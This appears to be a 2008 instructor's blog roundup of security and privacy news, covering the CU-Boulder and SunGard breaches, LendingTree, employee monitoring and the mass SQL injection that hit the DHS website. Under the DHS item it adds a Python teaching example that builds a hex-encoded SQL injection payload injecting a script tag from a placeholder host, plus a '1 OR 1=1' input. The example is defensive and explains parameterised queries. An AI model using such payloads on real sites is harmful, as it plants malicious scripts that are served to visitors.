Close to home
CU-Boulder Alerting Students And Faculty In Wake Of Compromised Continuing Education Computers
The University of Colorado at Boulder today announced that it discovered three computers in the Division of Continuing Education and Professional Studies were compromised and that one of the computers contains private data (i.e. names, Social Security numbers, addresses, grades) of approximately 9,000 students and approximately 500 instructors.
Although at this time there is no reason to believe that the data on the computer has been accessed, the university will be contacting the affected students and instructors to provide guidance about how to protect their identities.
An analysis of the data compromise is being conducted by a computer forensics firm hired by the university. While this analysis is still in progress, it is believed that this data compromise affects some students who were enrolled in Division of Continuing Education and Professional Studies courses between 1997 and 2003, as well as some instructors employed by the division. The university will mail letters to affected parties by the end of next week.
Source - University of Colorado - Boulder
First words from SunGard?
Sungard still assessing the scope of breach (update)
As of today, Sungard Higher Education was continuing to investigate and analyze the incident involving a laptop stolen from one of their employees. The total number of clients and individuals who had personal information on the laptop is not yet known. Some more new details did emerge today, however.
In contrast to many recent breaches where a laptop was stolen from an employee's vehicle or home, the Sungard laptop was stolen from an employee while the employee was working at a customer site. [That may complicate liability, but the solution is the same. Encryption. Bob] According to a spokesperson, the employee was not following company policies. In a statement provided to PogoWasRight.org, Laura Kvinge, Senior Director of Communication, wrote, "SunGard Higher Education has strict policies for data retention and the handling of sensitive customer information. In this case that policy was not followed."
In order to assist their customers, and in addition to the web site and FAQ they created quickly to respond to the situation, Sungard is offering one year of credit monitoring membership for all affected individuals. In an effort to alleviate the number of calls that the institutions would otherwise have to handle, Sungard has also created a help desk to personally answer calls and assist individuals.
According to Ms. Kvinge, Sungard also offered to assist with the entire notification process, including the production and mailing of notification letters as the institution deems appropriate.
"This incident is a serious matter for SunGard Higher Education. We realize that this challenges the relationship of trust we have built with our customers and we are going to have to work very hard to gain that back."
How to handle the fallout from a security breach? (Remember the “Streisand Effect”)
LendingTree Pressures Blogger To Remove Comments
from the section-230-anyone? dept
You may have heard the story earlier this week about how LendingTree had a security breach as employees were apparently handing out company passwords to mortgage firms, allowing them to access customer data directly. [Not in the articles I read... Bob] LendingTree is now suing the mortgage firms involved. However, LendingTree is apparently trying to crack down on some of the discussion about all of this. On one blog that wrote about the story, a commenter left a comment alleging that LendingTree doesn't actually "let banks compete" but has its own lending center -- which seems to be based on a class action lawsuit that was filed against LendingTree a couple years ago.
However, LendingTree is now putting pressure on bloggers to remove such comments, mentioning that they're defamatory. Of course, thanks to section 230 of the CDA, a blogger is not responsible for defamatory content left by others (they are still responsible for their own defamatory content, of course). While it doesn't appear that LendingTree's legal notes have entirely reached the level of a cease & desist (more like a legalistic nudge), it does sound like they've convinced some other bloggers to remove content that need not be removed. And, of course, by claiming that the content is defamatory, it may scare some bloggers who don't understand their section 230 safe harbors to feel obligated to remove the content.
A mere amateur. The pros were intercepting the wireless signals from another building...
If Top Gov't Officials Need To Leave Blackberries Outside A Meeting, Shouldn't Someone Guard Them?
from the just-a-thought dept
Apparently a Mexican press attache at a meeting with White House officials in New Orleans saw an opportunity and swiped the Blackberries of a bunch of White House staffers. At many such meetings, it's required for attendees to leave their phones and mobile devices outside of the meeting room. You would think that with such high-powered government officials that someone would then be left to guard the devices, but apparently not. This guy grabbed a bunch of the devices and made a run for the airport, where he was caught by Secret Service officials, who promptly showed him the surveillance camera footage of him taking the devices. His response was that he thought the devices had been left behind, and he was merely picking them up to return them to their owners, which might be more believable if the folks weren't still in the meeting room when he grabbed all the devices. Who knows if it's true, but I'm still wondering why no one was guarding the Blackberries.
CyberWar For my Security students
Page last updated at 13:48 GMT, Friday, 25 April 2008 14:48 UK
Hackers warn high street chains
High street chains will be the next victims of cyber terrorism, some of the world's elite hackers have warned.
... "If someone wants to have a pop at the UK, they are unlikely to go for the government web servers. They will go for the lower hanging fruit - companies which are seen as good representatives of the country.
Moving into the 21st Century... Blogging done right!
Beer, Blogs And Bias
from the i'll-drink-to-that dept
The Wall Street Journal has an article focusing on a blog set up by Miller Brewing Company called Brew Blog. There are a few different, interesting points worth discussing here. First, the blog isn't used as a blog about what's going on at Miller Brewing. Instead, Miller hired an experienced reporter, and told him to just cover the beer industry as if he were a beat reporter. In other words, it's reporting news -- and even breaking stories on the competition. In fact, it revealed that main rival Anheuser-Busch was planning a new beer before A-B was able to make the announcement itself. This is certainly a recognition of how content is advertising. The blog clearly isn't "advertorial." It's full-on reporting about the industry, in a way that's interesting and relevant to those in the industry.
What may be even more interesting, though, is what the article says about journalism. In an age in which journalists are whining that their jobs are disappearing, here's yet another example of where suddenly there are new types of jobs for journalists appearing every day. But, even more interesting, is a quote at the end of the article highlighted by David Card. It's from Harry Schuhmacher, the editor and publisher of a fee-based trade publication on the beer industry:
"I tell Miller you're subsidizing a free publication, and it hurts the trade press," he says. "But they don't care."...Mr. Schuhmacher adds that he writes fewer positive pieces about Miller than he once did because he knows Brew Blog will always publish the same stories.
Think about this for a bit. People complain that when you have a company-sponsored publication it will inevitably be biased -- but the sponsorship of that site is totally open and in the clear. The site's content stands for itself. Yet, at the same time, a supposedly "objective" traditional journalist is admitting that he writes fewer stories about Miller because he's upset that it's competing with his own publication. From that, it would certainly seem like the Brew Blog is a lot more credible (its biases are out in the open), while this fee-based trade pub admits that story choices are sometimes based on personal vendettas.
If I recall correctly, this is called “undue reliance” The computer is NOT always right, nor are procedures always adequate. (Besides, an “irate” judge often writes amusing opinions...)
Judge Slams Florida Authorities For Bogus Toll Fines
from the it's-all-about-the-money dept
It's not just with red light cameras that local authorities are squeezing extra money out of drivers, Consumerist points us to the news that a judge in Florida has tossed out thousands of bogus toll citations, slamming both the Orlando-Orange County Expressway Authority and Florida Turnpike Authority for failing to deal with the fines properly. It appears that some of the fines resulted from malfunctioning toll transponders. The judge noted that this should have been easy for the traffic authorities to correct, but instead they made it a bureaucratic nightmare for those unfairly and incorrectly accused of running tolls. The judge has even gone so far as to bar the two Authorities from issuing any new citations to drivers who have prepaid or credit-card accounts -- to the point that he's instructed the court clerks in both places to refuse to accept any new citations without affidavits swearing that the offenders have no money in their accounts.
[From the article:
"In this technology age, it is hard to believe it would take more than a few computer keystrokes to rectify the problem of matching alleged violators to account holder's vehicles," Galluzzo wrote.
Perhaps they could wire the attorneys' chairs in order to deliver instant (1000 volt) sanctions?
April 25, 2008
Long Range Plan for Information Technology in the Federal Judiciary
"The fiscal year 2008 update to the Long Range Plan for Information Technology in the Federal Judiciary articulates five-year directions and objectives for the judiciary’s information technology program. The plan presents the program in terms of five fundamental areas: external participants, court operations, judges and chambers, probation and pretrial services, and information technology infrastructure. This represents a more aggressive effort to identify needs by various constituents. Future updates to the plan will build on this approach and incorporate additional elements."
What do you need to know and how will you find out?
UK: Office snooping software attacked by privacy groups
Companies are coming under fire from privacy campaigners for rolling out a computer program which enables them to track the communications and contacts of their staff.
... One of the more sophisticated programs, provided by a software company called Contact Networks, analyses the frequency of an employee's communications with their contacts, to distinguish, for instance, between someone contacted briefly in relation to one deal, say, and someone with whom a more long-standing relationship exists.
Source - Times Online
[From the article:
The software can be put to a range of uses, from a simple trawling of the entire company's Microsoft Outlook database to see if any employee knows someone at 'company X', through to a more intrusive approach, including monitoring the content of e-mails on a regular basis.
Perhaps we shouldn't follow their lead...
Department of Homeland Security website hacked!
By Dan Goodin Published Friday 25th April 2008 18:57 GMT
The sophisticated mass infection that's injecting attack code into hundreds of thousands of reputable web pages is growing and even infiltrated the website of the Department of Homeland Security.
While so-called SQL injections are nothing new, this latest attack, which we reported earlier, is notable for its ability to infect huge numbers of pages using only a single string of text. At time of writing, Google searches here, here and here showed almost 520,000 pages containing the infection string, though the exact number changes almost constantly. As the screenshot below shows, even the DHS, which is responsible for protecting US infrastructure against cyber attacks, wasn't immune.
... The script is also notable for its ability to slip past web application defenses. The SQL query is mostly made up of HEX code, allowing it to obscure itself, at least to apps that use Microsoft SQL. MySQL and PostgreSQL are less easily fooled, according to researcher Ronald van den Heetkamp.
Sites are getting pwned because they fail to sanitize user-supplied data.
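For the students: the Register piece describes the mechanism (one string, mostly hex, that the database decodes and executes) but doesn't show it. The following is an added example written for this page, not code from the article or from the attack itself. The payload is constructed in the same style (DECLARE/CAST/EXEC around a hex literal) with a placeholder host, example.invalid, rather than the real 2008 script domain, and SQLite stands in for Microsoft SQL Server, so the simulation runs the decoded statement directly instead of through EXEC(). It shows three things: what a hex literal hides from a keyword filter, why string-concatenated queries are the bug, and why bound parameters are the fix rather than "sanitizing".

```python
import re
import sqlite3

# Constructed example payload in the style the article describes: the visible
# statement is almost entirely a hex literal, and the real SQL only appears
# after CAST() turns it back into text and EXEC() runs it. The script URL is a
# placeholder (example.invalid), not the domain used in the 2008 campaign.
HIDDEN_SQL = (
    "UPDATE pages SET body = body || "
    "'<script src=\"http://example.invalid/x.js\"></script>'"
)
ENCODED_PAYLOAD = (
    "DECLARE @S VARCHAR(4000);SET @S=CAST(0x"
    + HIDDEN_SQL.encode("ascii").hex()
    + " AS VARCHAR(4000));EXEC(@S)"
)

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


def decode_hex_literals(sql: str) -> list:
    """Return the text hidden inside every 0x... literal of a statement.

    This is the first thing to do when triaging a suspicious request log:
    the hex blob, not the DECLARE/CAST wrapper, is where the attack lives.
    """
    return [bytes.fromhex(h).decode("ascii", errors="replace")
            for h in HEX_LITERAL.findall(sql)]


def keyword_filter(sql: str) -> bool:
    """A naive blacklist of the kind the hex encoding walks straight past.

    Returns True if the statement *looks* like an attack. It flags the decoded
    statement but not the encoded one, because hex digits never spell
    'update', 'insert' or '<script'.
    """
    lowered = sql.lower()
    return any(word in lowered for word in ("update ", "insert ", "<script"))


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for a site's content database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO pages VALUES (1, 'home',  '<p>welcome</p>');
        INSERT INTO pages VALUES (2, 'about', '<p>about us</p>');
    """)
    return conn


def lookup_unsafe(conn: sqlite3.Connection, page_id: str) -> list:
    """The pattern that got sites pwned: the request value is pasted into SQL."""
    rows = conn.execute("SELECT title FROM pages WHERE id = " + page_id)
    return sorted(r[0] for r in rows)


def lookup_safe(conn: sqlite3.Connection, page_id: str) -> list:
    """The fix: a bound parameter is compared as a value, never parsed as SQL."""
    rows = conn.execute("SELECT title FROM pages WHERE id = ?", (page_id,))
    return sorted(r[0] for r in rows)


def simulate_mass_injection(conn: sqlite3.Connection, stacked_sql: str) -> list:
    """Show what one appended statement does to every row of a text column.

    SQLite has no EXEC(), so this runs the decoded statement directly with
    executescript(), which accepts stacked statements the way the MS SQL
    driver behind the vulnerable sites did.
    """
    conn.executescript(stacked_sql)
    return [r[0] for r in conn.execute("SELECT body FROM pages ORDER BY id")]


if __name__ == "__main__":
    print("hidden statement :", decode_hex_literals(ENCODED_PAYLOAD)[0])
    print("filter on encoded:", keyword_filter(ENCODED_PAYLOAD))
    db = make_db()
    print("unsafe lookup    :", lookup_unsafe(db, "1 OR 1=1"))
    print("safe lookup      :", lookup_safe(db, "1 OR 1=1"))
    print("after injection  :", simulate_mass_injection(db, HIDDEN_SQL))
```

The point of the last function is the scale the article reports: the attacker does not need to know your schema. One UPDATE over a text column (the real payload walked the system tables to find every such column) puts the script tag into every page the site serves, which is why a single string could touch hundreds of thousands of pages. The point of the two lookup functions is that the only durable defence is to keep data out of the SQL parser entirely; a filter that inspects the string for bad words is exactly what the hex encoding was built to beat.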
Got video? For my web site class
StartYourTube.com - Create the Next Big Thing Online
Just as the name implies, Start Your Tube is a site that encourages users to start their own version of YouTube in hopes that it explodes. Start Your Tube allows users to create their own video sharing site within minutes for free, then invite friends to view the uploaded content. Users may customize their own Tube site with colors, text, and graphics, in addition to posted material. Tube creators can easily spread the word about their created site through the “Share” function. Other Tubes can be searched and viewed for inspiration and entertainment. Furthermore, users have the ability to make money from advertising on their Tubes.
I bet they meant to do that – or perhaps none of them have minds like Beavis & Butt-Head?
OGC unveils new logo to red faces
By Aislinn Simpson Last Updated: 3:58pm BST 25/04/2008